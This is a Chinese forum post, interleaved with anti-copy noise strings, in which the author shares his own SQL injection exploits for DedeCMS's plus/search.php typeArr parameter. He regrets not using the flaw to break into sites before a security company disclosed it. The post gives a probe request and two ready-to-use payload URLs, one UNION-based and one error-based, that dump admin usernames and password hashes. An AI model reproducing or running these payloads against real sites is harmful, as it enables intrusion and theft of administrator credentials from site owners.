转载不加作者名的没JJ
$ | ]! F6 [* B9 a# U8 i) g9 X4 C, i$ ~+ O( ]# ^8 m1 E$ O
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。* U) \6 h& s+ ^0 h
' v' S. j! ?4 U9 B. X9 t0 s既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
* e, D4 ^ A$ c. n
( s" Z8 p5 c0 M* S' A5 C我一般是这样测试的:
( {" R2 }, U6 @ a/ x+ t* |# d. o3 M
* i) U" \, K7 F3 v1 @提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
9 V; g( W2 _ z# K3 c1 Y1 u# D' ~& h# Z: Y3 @: J" v- Z
转载不加作者名的没JJ* d1 A' k% d& @) F- c* Z$ M
: Y8 ?8 v( k" O" ^- G作者:鬼哥( I7 p# d* T2 D2 m9 h6 K" S
9 x4 P( w& T5 A6 i1 \+ f) R ' M0 I( b7 j @/ t, w% W
+ J, [6 T7 ~) n! R
看结果如果提示
3 X* }% v. R' Y0 s: }3 X% z1 k' Y8 t f2 |% A8 q
Safe Alert: Request Error step 2 !
5 W* }" V& U; Y: ]& {( O! e) h% n5 Z0 M
那么直接用下面的exp
1 C/ k% Q* G$ Y2 l6 k1 n6 a
. u6 i* O3 Q9 H, o& v% F: Bxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
( l' `4 F# S8 t4 ?1 C, q
: Q* l v# s, y% p
! R% s# ]1 s1 W6 M( l看结果如果提示) ?- B8 p5 O; x" k1 r( f3 w
/ x2 v: s/ p+ g0 T7 i0 ?9 y
Safe Alert: Request Error step 1 !
9 |3 X/ F8 r* R( }+ Y k/ j$ D. a; l. r' F' _# g6 T
那么直接用下面的exp
4 o+ Y# ?( f. Y6 e0 }8 D$ B8 o( l* _% [/ g# r
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
0 s/ |# z) r4 H, _( n% G f+ I
7 X6 D5 @; Y& ^; f& f4 D1 A# M0 J$ A* y! U
如果正常显示证明漏洞不存在了。, [& ~- S4 A& Z# V9 r5 R$ U) ^9 E9 t
% v& O+ y9 K5 {' @5 P0 X
转载不加作者名的没JJ |